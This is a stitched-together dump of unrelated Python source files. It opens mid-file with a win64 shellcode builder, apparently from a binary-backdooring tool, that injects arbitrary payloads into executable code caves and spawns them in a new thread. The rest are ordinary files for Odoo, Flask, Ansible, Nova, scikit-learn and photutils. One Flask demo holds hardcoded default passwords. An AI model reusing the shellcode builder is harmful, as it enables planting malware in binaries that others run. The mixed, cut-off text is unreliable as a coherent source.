if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip('L')), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip('L')), 16))
else:
self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3)
else:
self.shellcode1 += "\xeb\x43"
# got_payload:
self.shellcode1 += ( "\x5e" #pop rsi ; Prepare ESI with the source to copy
"\xf2\xa4" #rep movsb ; Copy the payload to RWX memory
"\xe8\x00\x00\x00\x00" #call set_handler ; Configure error handling
#set_handler:
"\x48\x31\xC0" # xor rax,rax
"\x50" # push rax ; LPDWORD lpThreadId (NULL)
"\x50" # push rax ; DWORD dwCreationFlags (0)
"\x49\x89\xC1" # mov r9, rax ; LPVOID lpParameter (NULL)
"\x48\x89\xC2" #mov rdx, rax ; LPTHREAD_START_ROUTINE lpStartAddress (payload)
"\x49\x89\xD8" #mov r8, rbx ; SIZE_T dwStackSize (0 for default)
"\x48\x89\xC1" #mov rcx, rax ; LPSECURITY_ATTRIBUTES lpThreadAttributes (NULL)
"\x49\xC7\xC2\x38\x68\x0D\x16" #mov r10, 0x160D6838 ; hash( "kernel32.dll", "CreateThread" )
"\xFF\xD5" # call rbp ; Spawn payload thread
"\x48\x83\xC4\x58" #add rsp, 50
#stackrestore
"\x9d\x41\x5f\x41\x5e\x41\x5d\x41\x5c\x41\x5b\x41\x5a\x41\x59"
"\x41\x58\x5d\x5f\x5e\x5a\x59\x5b\x58"
)
breakupvar = eat_code_caves(flItms, 0, 2)
#Jump to the win64 return to normal execution code segment.
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip('L')), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip('L')), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(0xffffffff + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3).rstrip('L')), 16))
breakupvar = eat_code_caves(flItms, 0, 1)
#get_payload: #Jump back with the address for the payload on the stack.
if flItms['cave_jumping'] is True:
self.shellcode2 = "\xe8"
if breakupvar > 0:
if len(self.shellcode2) < breakupvar:
self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - breakupvar -
len(self.shellcode2) + 272).rstrip('L')), 16))
else:
self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - len(self.shellcode2) -
breakupvar + 272).rstrip('L')), 16))
else:
self.shellcode2 += struct.pack("<I", int(str(hex(abs(breakupvar) + len(self.stackpreserve) +
len(self.shellcode2) + 244).rstrip('L')), 16))
else:
self.shellcode2 = "\xE8\xB8\xFF\xFF\xFF"
#Can inject any shellcode below.
self.shellcode2 += self.supplied_shellcode
self.shellcode1 += "\xe9"
self.shellcode1 += struct.pack("<I", len(self.shellcode2))
self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2
return (self.stackpreserve + self.shellcode1, self.shellcode2)
##########################################################
# END win64 shellcodes #
##########################################################
|
# Isaac Julien
# a-star
import sys
sys.path.append('../')
import operations as ops
from exptree import ExpTree
import random
from Queue import PriorityQueue
import gen_data, expand, fit
from scipy.optimize import curve_fit
from scipy.stats import gaussian_kde
import numpy as np
import matplotlib.pyplot as plt
import warnings
import math
''' Basic implementation of A* search '''
'''
Notes:
- No pruning or limitations on operations performed on leaves
- Interpreting error as h (measure of distance to goal)
'''
class AStar:
'''
A state in the search space
'''
class AStarState:
def __init__(self, exptree, score, depth, fit_consts):
self.exptree = exptree
self.score = score
self.fit_consts = fit_consts
self.depth = depth
'''
Input = lists of x and y coordinates
'''
def __init__(self, X, Y, thresh=.1, max_iter=50, draw_graph=False):
# PLOT THE BEST ERROR OVER TIME!
# LEARN EXPANSION 'RULES' based on HOW MUCH THE ERROR IMPROVES
# Log guesses
logfile = open("./guesses", 'w')
self.X = X
self.Y = Y
self.THRESH = thresh
self.MAX_DEPTH = 10
self.MAX_ITER = max_iter
self.guesses = 5 # Number of guesses per fit
'''
For plotting purposes:
'''
self.best_err = []
exptree = ExpTree()
init_consts, init_score = self.score(exptree, exptree.constants)
init_state = AStar.AStarState(exptree, init_score, 0, init_consts)
'''
Minimum error expression, in case we hit max_iter:
'''
self.min = init_state
self.states = PriorityQueue()
self.states.put((1, init_state))
iter = 0
while True:
if iter > self.MAX_ITER:
print "Hit max iterations. Best so far: " + str(self.min.exptree.root.collapse())
print "\tError: " + str(self.min.score)
print "\tFitted constants: " + str(self.min.fit_consts)
break
iter += 1
# Choose state to expand:
try:
state_to_expand = self.states.get(False)[1]
except:
print "Could not find any more states to expand"
break
expr_to_expand = state_to_expand.exptree
expr_str = str(expr_to_expand.root.collapse())
self.best_err.append(state_to_expand.score)
print "EXPANDING:", expr_str, state_to_expand.fit_consts, state_to_expand.score
'''
++++++++++++++++++++++++++++++++++ This is where the expansion happens: +++++++++++++++++++++++++++++++++++
'''
#children = expand.expand(expr_to_expand)
children = expand.expand_smart_two_levels(expr_to_expand)
'''
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
'''
temp = set()
for child in children:
#logfile.write(expr_str + '\t' + str(child.root.collapse()))
#logfile.write('\n')
#logfile.flush()
try:
fit_constants, score = self.score(child.root.collapse(), child.constants)
if score < 0:
print "???"
return
child_depth = state_to_expand.depth + 1
if score < self.THRESH:
self.best_err.append(score)
self.min = AStar.AStarState(child, score, child_depth, fit_constants)
print "Found solution! " + str(child.root.collapse())
print "\tError: " + str(score)
print "\tFitted constants: " + str(fit_constants)
print
return
if child_depth >= self.MAX_DEPTH:
print "\tHit maximum depth"
continue
new_state = AStar.AStarState(child, score, child_depth, fit_constants)
temp.add(new_state)
'''
Keeping track of the min state:
'''
if score < self.min.score:
#print "min:", min.exptree.root.collapse(), score
self.min = new_state
except:
print '\t' + str(child.root.collapse()) + "FAILED"
for new_state in temp:
'''
Calculate expected error of next state:
'''
er = new_state.score / (state_to_expand.score + .0001)
ee = er #er * new_state.score <--- changed this
#if ee < 0:
# ee = new_state.score
print '\t', new_state.exptree.root.collapse(), "SCORE", new_state.score, "EXPECT: ", ee
new_score = new_state.score * new_state.depth
self.states.put((new_score, new_state))
#new_err = ee + new_state.depth
#self.states.put((new_err, new_state))
'''
Return a score for the fit of exptree on x and y
'''
def score(self, exptree, constants):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
a, b = fit.sym_fit(exptree, constants, self.X, self.Y, self.guesses)
if b < 0:
return a, float("inf")
return a, b
'''
---------------------------------------------------------------------------------------------------
'''
def basic():
print "Getting data..."
expr_depth = 2
tree, constants, x, y = gen_data.get_single_expression_and_data(expr_depth)
print "Got 1000 points with 0 error for expression: " + str(tree.root.collapse())
print "With constants: " + str(constants)
print
print "Beginning A*..."
print
print
astar = AStar(x, y, draw_graph=False)
err = astar.best_err
plt.plot(range(len(err)), err)
plt.axis([-.1, len(err)+1, -1, max(err)+1])
plt.show()
'''
---------------------------------------------------------------------------------------------------
'''
def problem_case():
exptree = ExpTree()
exptree.apply_binary_op(exptree.root, ops.add)
l1, l2 = exptree.leaves[0], exptree.leaves[1]
exptree.apply_unary_op(l1, ops.sin)
exptree.apply_unary_op(l2, ops.tan)
x, y = gen_data.get_data(exptree, [])
print exptree.root.collapse()
print
astar = AStar(x, y, draw_graph=False)
err = np.array([x for x in astar.best_err if not math.isnan(x) and not math.isinf(x)])
print err
plt.plot(range(len(err)), err)
plt.axis([-.1, len(err)+1, -1, max(err)+1])
plt.show()
'''
---------------------------------------------------------------------------------------------------
'''
def real_data():
import data
'''
Which data to use:
'''
y = data.oscillator
x = [x for x in range(1,len(y)+1)]
x = [xi/float(max(x)) for xi in x]
y = [yi/float(max(y)) for yi in y]
astar = AStar(x, y, 10, 50, False)
best = astar.min
besty = gen_data.get_y_data(best.exptree, best.fit_consts, x)
plt.scatter(x, y)
plt.hold(True)
plt.plot(besty)
plt.show()
def kde():
import pyqt_fit.kernel_smoothing as smooth
import data
'''
Which data?
'''
y = np.array(data.hubbert)
x = np.array([x for x in range(1,len(y)+1)])
x = [xi/float(max(x)) for xi in x]
y = [yi/float(max(y)) for yi in y]
print "Data:", x, y
estimator = smooth.SpatialAverage(x, y)
estimate = estimator.evaluate(x)
astar = AStar(x, y, .01, 50, False)
best = astar.min
besty = gen_data.get_y_data(best.exptree, best.fit_consts, x)
print "MSE of kernel smoothing estimation: ", mse(y, estimate)
print "MSE of function-space greedy search: ", mse(y, besty)
plt.scatter(x, y, color='b')
plt.hold(True)
plt.plot(x, estimate, color='g')
plt.plot(x, besty, color='r')
plt.show()
def mse(actual, predicted):
mse = 0
for i in range(len(actual)):
diff = predicted[i] - actual[i]
mse += diff * diff
return mse / len(actual)
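# A vectorized equivalent of mse() above, included only for clarity; this is a
# sketch that assumes `actual` and `predicted` are equal-length, array-like
# numeric sequences.
def mse_vectorized(actual, predicted):
    return np.mean((np.asarray(predicted) - np.asarray(actual)) ** 2)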
def main():
kde()
#real_data()
if __name__ == "__main__":
main()
|
# -*- coding: utf-8 -*-
import logging
import base64
import os
from openerp.osv import osv
from openerp.tools.translate import _
_logger = logging.getLogger(__name__)
from openerp.addons.account_bank_statement_import import account_bank_statement_import as ibs
ibs.add_file_type(('ofx', 'OFX'))
try:
from ofxparse import OfxParser as ofxparser
except ImportError:
_logger.warning("OFX parser unavailable because the `ofxparse` Python library cannot be found. "
                "It can be downloaded and installed from `https://pypi.python.org/pypi/ofxparse`.")
ofxparser = None
class account_bank_statement_import(osv.TransientModel):
_inherit = 'account.bank.statement.import'
def process_ofx(self, cr, uid, data_file, journal_id=False, context=None):
""" Import a file in the .OFX format"""
if ofxparser is None:
raise osv.except_osv(_("Error"), _("OFX parser unavailable because the `ofxparse` Python library cannot be found. "
                                   "It can be downloaded and installed from `https://pypi.python.org/pypi/ofxparse`."))
try:
tempfile = open("temp.ofx", "w+")
tempfile.write(base64.decodestring(data_file))
tempfile.close()
pathname = os.path.dirname('temp.ofx')
path = os.path.join(os.path.abspath(pathname), 'temp.ofx')
ofx = ofxparser.parse(file(path))
except:
raise osv.except_osv(_('Import Error!'), _('Please check that the OFX file has a valid format.'))
line_ids = []
total_amt = 0.00
try:
for transaction in ofx.account.statement.transactions:
bank_account_id, partner_id = self._detect_partner(cr, uid, transaction.payee, identifying_field='owner_name', context=context)
vals_line = {
'date': transaction.date,
'name': transaction.payee + ': ' + transaction.memo,
'ref': transaction.id,
'amount': transaction.amount,
'partner_id': partner_id,
'bank_account_id': bank_account_id,
}
total_amt += float(transaction.amount)
line_ids.append((0, 0, vals_line))
except Exception, e:
raise osv.except_osv(_('Error!'), _("The following problem occurred while importing your file. Please verify that the file is valid.\n\n %s") % e.message)
st_start_date = ofx.account.statement.start_date or False
st_end_date = ofx.account.statement.end_date or False
period_obj = self.pool.get('account.period')
if st_end_date:
period_ids = period_obj.find(cr, uid, st_end_date, context=context)
else:
period_ids = period_obj.find(cr, uid, st_start_date, context=context)
vals_bank_statement = {
'name': ofx.account.routing_number,
'balance_start': ofx.account.statement.balance,
'balance_end_real': float(ofx.account.statement.balance) + total_amt,
'period_id': period_ids and period_ids[0] or False,
'journal_id': journal_id
}
vals_bank_statement.update({'line_ids': line_ids})
os.remove(path)
return [vals_bank_statement]
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import codecs
from setuptools import setup
def read(fname):
file_path = os.path.join(os.path.dirname(__file__), fname)
return codecs.open(file_path, encoding='utf-8').read()
setup(
name='pytest-lazy-fixture',
version='0.6.3',
author='Marsel Zaripov',
author_email='[email protected]',
maintainer='Marsel Zaripov',
maintainer_email='[email protected]',
license='MIT',
url='https://github.com/tvorog/pytest-lazy-fixture',
description='It helps to use fixtures in pytest.mark.parametrize',
long_description=read('README.rst'),
py_modules=['pytest_lazyfixture'],
install_requires=['pytest>=3.2.5'],
classifiers=[
'Development Status :: 4 - Beta',
'Framework :: Pytest',
'Intended Audience :: Developers',
'Topic :: Software Development :: Testing',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: Implementation :: CPython',
'Programming Language :: Python :: Implementation :: PyPy',
'Operating System :: OS Independent',
'License :: OSI Approved :: MIT License',
],
entry_points={
'pytest11': [
'lazy-fixture = pytest_lazyfixture',
],
},
)
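# A minimal usage sketch of the plugin packaged above, shown for illustration.
# It belongs in a separate, hypothetical test module (e.g. test_example.py),
# not in setup.py itself; the fixtures `one` and `two` are assumptions made up
# here to show how lazy_fixture defers fixture resolution inside parametrize.
import pytest


@pytest.fixture
def one():
    return 1


@pytest.fixture
def two():
    return 2


@pytest.mark.parametrize('value,expected', [
    (pytest.lazy_fixture('one'), 1),
    (pytest.lazy_fixture('two'), 2),
])
def test_lazy_fixture_values(value, expected):
    assert value == expected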
|
#
# detect.py
#
# Copyright (C) 2009-2010 John Garland <[email protected]>
#
# Deluge is free software.
#
# You may redistribute it and/or modify it under the terms of the
# GNU General Public License, as published by the Free Software
# Foundation; either version 3 of the License, or (at your option)
# any later version.
#
# deluge is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with deluge. If not, write to:
# The Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor
# Boston, MA 02110-1301, USA.
#
# In addition, as a special exception, the copyright holders give
# permission to link the code of portions of this program with the OpenSSL
# library.
# You must obey the GNU General Public License in all respects for all of
# the code used other than OpenSSL. If you modify file(s) with this
# exception, you may extend this exception to your version of the file(s),
# but you are not obligated to do so. If you do not wish to do so, delete
# this exception statement from your version. If you delete this exception
# statement from all source files in the program, then also delete it here.
#
#
from decompressers import Zipped, GZipped, BZipped2
from readers import EmuleReader, SafePeerReader, PeerGuardianReader
COMPRESSION_TYPES = {
"PK" : "Zip",
"\x1f\x8b" : "GZip",
"BZ" : "BZip2"
}
DECOMPRESSERS = {
"Zip" : Zipped,
"GZip" : GZipped,
"BZip2" : BZipped2
}
READERS = {
"Emule" : EmuleReader,
"SafePeer" : SafePeerReader,
"PeerGuardian" : PeerGuardianReader
}
class UnknownFormatError(Exception):
pass
def detect_compression(filename):
f = open(filename, "rb")
magic_number = f.read(2)
f.close()
return COMPRESSION_TYPES.get(magic_number, "")
def detect_format(filename, compression=""):
format = ""
for reader in READERS:
if create_reader(reader, compression)(filename).is_valid():
format = reader
break
return format
def create_reader(format, compression=""):
reader = READERS.get(format)
if reader and compression:
decompressor = DECOMPRESSERS.get(compression)
if decompressor:
reader = decompressor(reader)
return reader
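# A minimal usage sketch for the helpers above (assumes a blocklist path is
# passed on the command line): detect the compression, then the format, then
# build a (possibly decompressing) reader and check that the file is valid.
if __name__ == "__main__":
    import sys

    blocklist_path = sys.argv[1]  # path to a blocklist file
    compression = detect_compression(blocklist_path)
    format = detect_format(blocklist_path, compression)
    if not format:
        raise UnknownFormatError("unrecognised blocklist format: %s" % blocklist_path)
    reader = create_reader(format, compression)(blocklist_path)
    print("%s blocklist (%s), valid: %s" % (format, compression or "uncompressed", reader.is_valid()))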
|
from flask_wtf import FlaskForm
from wtforms import StringField, SubmitField, BooleanField, SelectField,TextAreaField
from wtforms.validators import Required,Length,Email,Regexp
from wtforms import ValidationError
from ..models import Role,User
from flask_pagedown.fields import PageDownField
class NameForm(FlaskForm):
name = StringField('What is your name?', validators=[Required()])
submit = SubmitField('Submit')
class EditProfileForm(FlaskForm):
name = StringField('Real name',validators=[Length(0,64)])
location = StringField('Location',validators=[Length(0,64)])
about_me = TextAreaField('About me')
submit = SubmitField('Submit')
class EditProfileAdminForm(FlaskForm):
email = StringField('Email',validators=[Required(),Length(1,64),Email()])
username = StringField('Username', validators=[Required(),Length(1,64),Regexp('^[A-Za-z][A-Za-z0-9_.]*$',0,'Usernames must have only letters, numbers, dots or underscores')])
confirmed = BooleanField('Confirmed')
role = SelectField('Role',coerce=int)
name = StringField('Real name', validators=[Length(0,64)])
location = StringField('Location',validators=[Length(0,64)])
about_me = TextAreaField('About me')
submit = SubmitField('Submit')
def __init__(self,user,*args,**kwargs):
super(EditProfileAdminForm,self).__init__(*args,**kwargs)
self.role.choices = [(role.id,role.name) for role in Role.query.order_by(Role.name).all()]
self.user = user
def validate_email(self,field):
if field.data != self.user.email and User.query.filter_by(email=field.data).first():
raise ValidationError('Email already registered')
def validate_username(self,field):
if field.data != self.user.username and User.query.filter_by(username=field.data).first():
raise ValidationError('Username already in use.')
class PostForm(FlaskForm):
body = PageDownField("What's on your mind?",validators=[Required()])
submit = SubmitField('Submit')
class CommentForm(FlaskForm):
body = StringField('',validators=[Required()])
submit = SubmitField('Submit')
|
"""Miscellaneous utility functions and classes specific to ansible cli tools."""
from __future__ import absolute_import, print_function
import os
from lib.util import common_environment
def ansible_environment(args, color=True):
"""
:type args: CommonConfig
:type color: bool
:rtype: dict[str, str]
"""
env = common_environment()
path = env['PATH']
ansible_path = os.path.join(os.getcwd(), 'bin')
if not path.startswith(ansible_path + os.pathsep):
path = ansible_path + os.pathsep + path
ansible_config = '/dev/null'
if os.path.isfile('test/integration/%s.cfg' % args.command):
ansible_config = os.path.abspath('test/integration/%s.cfg' % args.command)
ansible = dict(
ANSIBLE_FORCE_COLOR='%s' % 'true' if args.color and color else 'false',
ANSIBLE_DEPRECATION_WARNINGS='false',
ANSIBLE_CONFIG=ansible_config,
ANSIBLE_HOST_KEY_CHECKING='false',
PYTHONPATH=os.path.abspath('lib'),
PAGER='/bin/cat',
PATH=path,
)
env.update(ansible)
if args.debug:
env.update(dict(ANSIBLE_DEBUG='true'))
return env
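# A minimal sketch of calling ansible_environment() outside the test runner.
# The FakeArgs stand-in below is an assumption; real callers pass a
# CommonConfig object providing at least `command`, `color` and `debug`.
if __name__ == '__main__':
    class FakeArgs(object):
        command = 'integration'
        color = True
        debug = False

    for key, value in sorted(ansible_environment(FakeArgs()).items()):
        if key.startswith('ANSIBLE_'):
            print('%s=%s' % (key, value))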
|
# Copyright 2013 Red Hat Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import uuid
from nova import block_device
from nova.openstack.common import timeutils
class FakeDbBlockDeviceDict(block_device.BlockDeviceDict):
"""Defaults db fields - useful for mocking database calls."""
def __init__(self, bdm_dict=None, anon=False, **kwargs):
bdm_dict = bdm_dict or {}
db_id = bdm_dict.pop('id', 1)
instance_uuid = bdm_dict.pop('instance_uuid', str(uuid.uuid4()))
super(FakeDbBlockDeviceDict, self).__init__(bdm_dict=bdm_dict,
**kwargs)
fake_db_fields = {'instance_uuid': instance_uuid,
'deleted_at': None,
'deleted': 0}
if not anon:
fake_db_fields['id'] = db_id
fake_db_fields['created_at'] = timeutils.utcnow()
fake_db_fields['updated_at'] = timeutils.utcnow()
self.update(fake_db_fields)
def AnonFakeDbBlockDeviceDict(bdm_dict, **kwargs):
return FakeDbBlockDeviceDict(bdm_dict=bdm_dict, anon=True, **kwargs)
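# A minimal sketch of building a fake BDM for a test. The field values below
# are illustrative assumptions; BlockDeviceDict only accepts keys it knows
# about, so stick to standard block-device-mapping fields.
if __name__ == '__main__':
    fake_bdm = FakeDbBlockDeviceDict({'source_type': 'volume',
                                      'destination_type': 'volume',
                                      'volume_id': 'fake-volume-id',
                                      'device_name': '/dev/vdb'})
    print('%s %s' % (fake_bdm['id'], fake_bdm['instance_uuid']))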
|
import os
from flask import Flask, render_template_string, request
from flask_mail import Mail
from flask_sqlalchemy import SQLAlchemy
from flask_user import login_required, SQLAlchemyAdapter, UserManager, UserMixin
from flask_user import roles_required
# Use a Class-based config to avoid needing a 2nd file
# os.getenv() enables configuration through OS environment variables
class ConfigClass(object):
# Flask settings
SECRET_KEY = os.getenv('SECRET_KEY', 'THIS IS AN INSECURE SECRET')
SQLALCHEMY_DATABASE_URI = os.getenv('DATABASE_URL', 'sqlite:///single_file_app.sqlite')
CSRF_ENABLED = True
MAIL_USERNAME = os.getenv('MAIL_USERNAME', '[email protected]')
MAIL_PASSWORD = os.getenv('MAIL_PASSWORD', 'Wewillrockyou')
MAIL_DEFAULT_SENDER = os.getenv('MAIL_DEFAULT_SENDER', '"MyApp" <[email protected]>')
MAIL_SERVER = os.getenv('MAIL_SERVER', 'smtp.gmail.com')
MAIL_PORT = int(os.getenv('MAIL_PORT', '465'))
MAIL_USE_SSL = int(os.getenv('MAIL_USE_SSL', True))
# Flask-User settings
USER_APP_NAME = "Oreo Story" # Used by email templates
def create_app(test_config=None): # For automated tests
# Setup Flask and read config from ConfigClass defined above
app = Flask(__name__)
app.config.from_object(__name__+'.ConfigClass')
# Load local_settings.py if file exists # For automated tests
try: app.config.from_object('local_settings')
except: pass
# Load optional test_config # For automated tests
if test_config:
app.config.update(test_config)
# Initialize Flask extensions
mail = Mail(app) # Initialize Flask-Mail
db = SQLAlchemy(app) # Initialize Flask-SQLAlchemy
# Define the User data model. Make sure to add flask.ext.user UserMixin!!
class User(db.Model, UserMixin):
id = db.Column(db.Integer, primary_key=True)
# User authentication information
username = db.Column(db.String(50), nullable=False, unique=True)
password = db.Column(db.String(255), nullable=False, server_default='')
reset_password_token = db.Column(db.String(100), nullable=False, server_default='')
# User email information
email = db.Column(db.String(255), nullable=False, unique=True)
confirmed_at = db.Column(db.DateTime())
# User information
active = db.Column('is_active', db.Boolean(), nullable=False, server_default='0')
first_name = db.Column(db.String(100), nullable=False, server_default='')
last_name = db.Column(db.String(100), nullable=False, server_default='')
# Relationships
roles = db.relationship('Role', secondary='user_roles',
backref=db.backref('users', lazy='dynamic'))
# Define the Role data model
class Role(db.Model):
id = db.Column(db.Integer(), primary_key=True)
name = db.Column(db.String(50), unique=True)
# Define the UserRoles data model
class UserRoles(db.Model):
id = db.Column(db.Integer(), primary_key=True)
user_id = db.Column(db.Integer(), db.ForeignKey('user.id', ondelete='CASCADE'))
role_id = db.Column(db.Integer(), db.ForeignKey('role.id', ondelete='CASCADE'))
# Create all database tables
db.create_all()
# Setup Flask-User
db_adapter = SQLAlchemyAdapter(db, User)
user_manager = UserManager(db_adapter, app)
# Create 'user007' user with 'secret' and 'agent' roles
if not User.query.filter(User.username=='user007').first():
user1 = User(username='user007', email='[email protected]', active=True,
password=user_manager.hash_password('Password1'))
user1.roles.append(Role(name='secret'))
user1.roles.append(Role(name='agent'))
db.session.add(user1)
db.session.commit()
# The Home page is accessible to anyone
@app.route('/')
def home_page():
return render_template_string("""
{% extends "base.html" %}
{% block content %}
<h2>Home page</h2>
<p>This page can be accessed by anyone.</p><br/>
<p><a href={{ url_for('home_page') }}>Home page</a> (anyone)</p>
<p><a href={{ url_for('members_page') }}>Members page</a> (login required)</p>
<p><a href={{ url_for('special_page') }}>Special page</a> (login with username 'user007' and password 'Password1')</p>
{% endblock %}
""")
# The Members page is only accessible to authenticated users
@app.route('/members')
@login_required # Use of @login_required decorator
def members_page():
return render_template_string("""
{% extends "base.html" %}
{% block content %}
<h2>Members page</h2>
<p>This page can only be accessed by authenticated users.</p><br/>
<p><a href={{ url_for('home_page') }}>Home page</a> (anyone)</p>
<p><a href={{ url_for('members_page') }}>Members page</a> (login required)</p>
<p><a href={{ url_for('special_page') }}>Special page</a> (login with username 'user007' and password 'Password1')</p>
{% endblock %}
""")
# The Special page requires a user with the 'secret' role and either the 'sauce' or 'agent' role.
@app.route('/special')
@roles_required('secret', ['sauce', 'agent']) # Use of @roles_required decorator
def special_page():
return render_template_string("""
{% extends "base.html" %}
{% block content %}
<h2>Special Page</h2>
<p>This page can only be accessed by user007.</p><br/>
<p><a href={{ url_for('home_page') }}>Home page</a> (anyone)</p>
<p><a href={{ url_for('members_page') }}>Members page</a> (login required)</p>
<p><a href={{ url_for('special_page') }}>Special page</a> (login with username 'user007' and password 'Password1')</p>
{% endblock %}
""")
return app
# Start development web server
if __name__=='__main__':
app = create_app()
app.run(host='0.0.0.0', port=5000, debug=True)
|
# -*- coding: utf-8 -*-
##############################################################################
# For copyright and license notices, see __openerp__.py file in root directory
##############################################################################
from openerp import models, fields, api, exceptions, _
from datetime import datetime as dt
class MrpBomChange(models.Model):
_name = 'mrp.bom.change'
_description = 'Mrp BoM Component Change'
@api.one
@api.depends('old_component')
def _calc_boms(self):
self.boms = [(6, 0, [])]
if self.old_component:
for bom in self.env['mrp.bom'].search([]):
bom_lines = bom.bom_line_ids.filtered(
lambda x: x.product_id.id == self.old_component.id)
if bom_lines:
self.boms = [(4, bom.id)]
name = fields.Char('Name', required=True)
new_component = fields.Many2one('product.product', 'New Component',
required=True)
old_component = fields.Many2one('product.product', 'Old Component',
required=True)
create_new_version = fields.Boolean(
string="Create new BoM version", help='Check this field if you want to'
' create a new version of the BOM before modifying the component')
boms = fields.Many2many(
comodel_name='mrp.bom',
relation='rel_mrp_bom_change', column1='bom_change_id',
column2='bom_id', string='BoMs', copy=False, store=True, readonly=True,
compute='_calc_boms')
date = fields.Date('Change Date', readonly=True)
user = fields.Many2one('res.users', 'Changed By', readonly=True)
reason = fields.Char('Reason')
@api.multi
def do_component_change(self):
self.ensure_one()
if not self.old_component or not self.new_component:
raise exceptions.Warning(_("Not Components selected!"))
if not self.boms:
raise exceptions.Warning(_("There isn't any BoM for selected "
"component"))
for bom in self.boms:
bom_lines = bom.bom_line_ids.filtered(
lambda x: x.product_id.id == self.old_component.id)
if self.create_new_version:
new_bom = bom._copy_bom()
bom.button_historical()
new_bom.button_activate()
self.boms = [(3, bom.id)]
self.boms = [(4, new_bom.id)]
bom_lines = new_bom.bom_line_ids.filtered(
lambda x: x.product_id.id == self.old_component.id)
bom_lines.write({'product_id': self.new_component.id})
self.write({'date': dt.now(), 'user': self.env.uid})
return {'name': _('Bill of Material'),
'view_type': 'form',
'view_mode': 'tree,form',
'res_model': 'mrp.bom',
'type': 'ir.actions.act_window',
'domain': [('id', 'in', self.boms.mapped('id'))]
}
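# Hedged note, not part of the original module: the tuples written to
# ``boms`` above are standard Odoo x2many commands. As used here:
#   (6, 0, ids)  replace the whole relation with ``ids``
#   (4, id)      link the existing record ``id``
#   (3, id)      unlink record ``id`` without deleting it
# A minimal sketch of driving the wizard from code, assuming two existing
# product.product records ``old_prod`` and ``new_prod`` (names illustrative):
#
#     wizard = env['mrp.bom.change'].create({
#         'name': 'Swap component',
#         'old_component': old_prod.id,
#         'new_component': new_prod.id,
#         'create_new_version': True,
#     })
#     wizard.do_component_change()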
|
import numpy as np
from sklearn.base import BaseEstimator, TransformerMixin
from sklearn.metrics import mean_squared_error
from sklearn.linear_model import LogisticRegression, Ridge
from sklearn.pipeline import Pipeline
def relu(X):
"""Rectified Linear Unit"""
return np.clip(X, 0, None)
def sigmoid(X):
return 1 / (1 + np.exp(-X))
STR_TO_ACTIVATION = dict(
relu=relu,
sigmoid=sigmoid,
tanh=np.tanh,
)
class ElmTransform(BaseEstimator, TransformerMixin):
def __init__(self,
n_hidden,
activation_function="tanh",
std=1.0):
self.n_hidden = n_hidden
# assume it's a function if it is not in the dict
self.activate_ = STR_TO_ACTIVATION.get(activation_function,
activation_function)
self.std = std
def fit(self, X, y=None):
X = np.array(X)
self.weights_ = self.std * np.random.randn(X.shape[1], self.n_hidden)
self.biases_ = self.std * np.random.randn(self.n_hidden)
return self
def transform(self, X, y=None):
X = np.array(X)
p = X.dot(self.weights_)
return self.activate_(p + self.biases_)
def ElmRegressor(n_hidden, activation_function="tanh", std=1.0, **kwargs):
return Pipeline([("elm", ElmTransform(n_hidden, activation_function, std)),
("ridge", Ridge(**kwargs))])
def ElmClassifier(n_hidden, activation_function="tanh", std=1.0, **kwargs):
return Pipeline([("elm", ElmTransform(n_hidden, activation_function, std)),
("logreg", LogisticRegression(**kwargs))])
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
This module provides tools to build and fit an effective PSF (ePSF)
based on Anderson and King (2000; PASP 112, 1360) and Anderson (2016),
ISR WFC3 2016-12.
"""
import copy
import time
import warnings
from astropy.modeling.fitting import LevMarLSQFitter
from astropy.nddata.utils import (overlap_slices, PartialOverlapError,
NoOverlapError)
from astropy.stats import SigmaClip
from astropy.utils.exceptions import AstropyUserWarning
import numpy as np
from .epsf_stars import EPSFStar, EPSFStars, LinkedEPSFStar
from .models import EPSFModel
from ..centroids import centroid_com, centroid_epsf
from ..utils._round import _py2intround
try:
import bottleneck # pylint: disable=W0611
HAS_BOTTLENECK = True
except ImportError:
HAS_BOTTLENECK = False
__all__ = ['EPSFFitter', 'EPSFBuilder']
class EPSFFitter:
"""
Class to fit an ePSF model to one or more stars.
Parameters
----------
fitter : `astropy.modeling.fitting.Fitter`, optional
A `~astropy.modeling.fitting.Fitter` object.
